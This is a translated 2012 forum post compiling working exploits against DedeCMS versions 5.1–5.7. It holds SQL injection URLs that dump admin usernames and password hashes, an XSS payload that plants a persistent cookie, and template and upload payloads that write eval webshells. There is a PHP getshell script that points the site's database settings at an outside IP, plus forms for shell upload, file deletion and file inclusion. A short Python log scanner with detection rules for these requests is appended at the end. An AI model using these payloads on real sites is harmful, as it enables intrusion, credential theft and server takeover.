DedeCMS vulnerability summary

Posted 2012-10-18 10:42:14

Dedecms 5.6 RSS injection vulnerability

http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1

DedeCms v5.6 embedded malicious code execution vulnerability

Register as a member and upload a piece of software; in the local address field enter a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After publishing, viewing or editing the entry executes it.

a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This generates x.php with password xiao, a one-line shell written directly.

Dede 5.6 GBK SQL injection vulnerability

http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7

DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability

http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`

DEDECMS all versions gotopage variable XSS vulnerability

1. Copy and paste the URL below into the browser to trigger the XSS and install the XSS rootkit. Note that IE8/9 and similar browsers block URL-based XSS, so their XSS filter must be turned off.

http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="

2. Close the browser; afterwards, however you visit any of the URLs below, our XSS fires.

http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
http://v57.demo.dedecms.com/dede/login.php

DeDeCMS (织梦) variable override getshell

#!/usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author:
www.heixiaozi.comwww.webvul.com
');
echo "\r\n";
if($argv[2]==null){
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].'
www.site.com 1 old
+---------------------------------------------------------------------------+
');
exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
if (strpos($exp,"OK")>12){
echo "
Exploit Success \n";
if($aid==1)echo "
Shell:".$url."/$path/data/cache/fuck.php\n" ;
if($aid==2)echo "
Shell:".$url."/$path/fuck.php\n" ;
if($aid==3)echo "
Shell:".$url."/$path/plus/fuck.php\n";
}else{
echo "
Exploit Failed \n";
}
function Getshell($url,$aid,$path){
$id=$aid;
$host=$url;
$port="80";
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
//$data .= "Accept-Encoding: gzip,deflate\r\n";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
$data .= "Connection: keep-alive\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "
No response from ".$host."\n";
}
fwrite($ock,$data);
while (!feof($ock)) {
$exp=fgets($ock, 1024);
return $exp;
}
}
?>

DedeCms v5.6-5.7 unauthorized access vulnerability (direct entry to the admin backend)

http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

Change validate=dcug above to the current captcha value and you are taken straight into the site backend.

This only works if the backend path has already been obtained.

Dedecms (织梦) tag remote file write vulnerability

Precondition: you must have your own dede database ready, then insert the data: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');

Then submit with the form below; the shell is 1.php in the same directory. Work out the principle yourselves...

<form action="" method="post" name="QuickSearch" id="QuickSearch">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>

Dedecms <= V5.6 Final template execution vulnerability

1. Register a user, go to the member panel, publish an article and upload an image; then, in attachment management, replace the image with our carefully crafted template. For example, the image name is:
uploads/userup/2/12OMX04-15A.jpg

The template content is (if the image format is checked, prepend gif89a):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}

2. Edit the article just published, view the page source and construct a form:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />

<div id="mainCp">
<h3 class="meTitle"><strong>修改文章</strong></h3>

<div class="postForm">
<label>标题:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>

<label>标签TAG:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)

<label>作者:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>

<label>隶属栏目:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>测试栏目</option>
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)

<label>我的分类:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>

<label>信息摘要:</label>
<textarea name="description" id="description">1111111</textarea>
(内容的简要说明)

<label>缩略图:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>

<input type='text' name='templet'
value="../ uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields'
value="templet,htmltext;">(this is the constructed part)
</div>

<!-- form action area -->
<h3 class="meTitle">详细内容</h3>

<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>

<label>验证码:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />

<button class="button2" type="submit">提交</button>
<button class="button2 ml10" type="reset">重置</button>
</div>

</div>

</form>

Submit; if it reports that the edit succeeded, we have changed the template path. 3. Visit the edited article:
Assuming the aid of the article just edited is 2, we only need to visit:
http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is generated in the plus directory.

DEDECMS website management system Get Shell vulnerability (5.3/5.6)

Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save as 1.gif

<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /><br />
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >更改</button>
</form>

Construct the form above; after upload, the image is saved as /uploads/userup/3/1.gif.
Publish an article, then construct the edit form as follows:

<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">提交</button>
</form>

织梦 (Dedecms) V5.6 remote file deletion vulnerability

http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif

织梦 (Dedecms) V5.6 plus/carbuyaction.php local file inclusion vulnerability

http://www.test.com/plus/carbuya ... urn&code=../../

DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability

plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
The stored password is a 32-character MD5 with the first 5 and the last 7 characters removed, giving a 20-character MD5 value; from that, drop 3 from the front and 1 from the end to get the 16-character MD5.

织梦 (Dedecms) 5.1 feedback_js.php injection vulnerability

http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='

织梦 (Dedecms) select_soft_post.php uninitialised page variable vulnerability

<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just a exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>

织梦 (dedecms) 5.3 – 5.5 plus/digg_frame.php injection vulnerability

It exploits a MySQL numeric field overflow that triggers an error, together with the fact that DEDECMS logs database error messages into a PHP file whose header is not validated.
1. Visit the URL:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
The error message can be seen.

2. Visit
http://www.abc.com/data/mysql_error_trace.php; seeing the following output proves the injection succeeded.
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>

3. Run the test.html file from dede.rar; note that the action address in the form is

<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">

If you see the step-2 output after pressing OK, the trojan file was uploaded successfully.

织梦 (DedeCms) plus/infosearch.php file injection vulnerability

http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
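The request shapes collected above (GLOBALS override through _COOKIE/_POST, raw sql= to advancedsearch.php, a gotopage value carrying markup, traversal in edit_face.php and carbuyaction.php) all leave a visible trace in the web server access log. As an added defensive example, not part of the original post and not DedeCMS code, the Python below parses constructed access-log lines and flags those shapes; the rule names, log lines and IP addresses are constructed assumptions.

```python
import re
from urllib.parse import unquote

# Constructed Apache-style access-log lines (sample input, not from the original
# post): one benign request followed by requests shaped like the payloads above.
SAMPLE_LOG = """\
10.0.0.5 - - [18/Oct/2012:10:42:14 +0800] "GET /plus/view.php?aid=2 HTTP/1.1" 200 5120
10.0.0.6 - - [18/Oct/2012:10:43:01 +0800] "POST /plus/mytag_js.php?aid=1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=203.0.113.9 HTTP/1.1" 200 88
10.0.0.7 - - [18/Oct/2012:10:44:10 +0800] "GET /plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20%60%23@__admin%60 HTTP/1.1" 200 900
10.0.0.8 - - [18/Oct/2012:10:45:22 +0800] "GET /dede/login.php?gotopage=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 300
10.0.0.9 - - [18/Oct/2012:10:46:05 +0800] "GET /member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif HTTP/1.1" 200 10
10.0.0.10 - - [18/Oct/2012:10:47:00 +0800] "GET /plus/carbuyaction.php?code=../../ HTTP/1.1" 200 40
"""

# Common-log-format prefix: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d+)'
)

# Detection rules, applied to the URL-decoded request target. Names are our own.
RULES = [
    # Variable registration abuse: request arrays smuggled via _COOKIE/_POST/_GET
    # to overwrite cfg_dbhost and friends (mytag_js.php and login.php cases above).
    ("globals-override", re.compile(r"_(COOKIE|POST|GET)\[GLOBALS\]\[", re.I)),
    # Caller-supplied SQL text reaching advancedsearch.php.
    ("advancedsearch-raw-sql", re.compile(r"/plus/advancedsearch\.php\?(.*&)?sql=", re.I)),
    # gotopage value that carries a tag (reflected into the login page).
    ("gotopage-xss", re.compile(r"/login\.php\?(.*&)?gotopage=[^&]*<", re.I)),
    # Path traversal in the old-avatar deletion parameter.
    ("edit_face-traversal", re.compile(r"/member/edit_face\.php\?.*dopost=delold.*\.\./", re.I)),
    # Traversal in the code parameter of carbuyaction.php (local file inclusion).
    ("carbuyaction-lfi", re.compile(r"/plus/carbuyaction\.php\?(.*&)?code=[^&]*\.\./", re.I)),
]


def parse_line(line):
    """Split one log line into fields; returns None for lines that do not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    # Decode once so %5B...%5D, %3C and friends match the rules literally.
    rec["decoded"] = unquote(rec["target"])
    return rec


def classify(decoded_target):
    """Return the names of every rule that fires on a decoded request target."""
    return [name for name, rx in RULES if rx.search(decoded_target)]


def scan(log_text):
    """Return (ip, timestamp, matched rule names) for each suspicious request."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        names = classify(rec["decoded"])
        if names:
            hits.append((rec["ip"], rec["ts"], names))
    return hits


if __name__ == "__main__":
    for ip, ts, names in scan(SAMPLE_LOG):
        print(f"{ts} {ip} {', '.join(names)}")
```

Decoding the target once before matching is what makes the bracket and angle-bracket rules fire on the percent-encoded forms these requests normally arrive in.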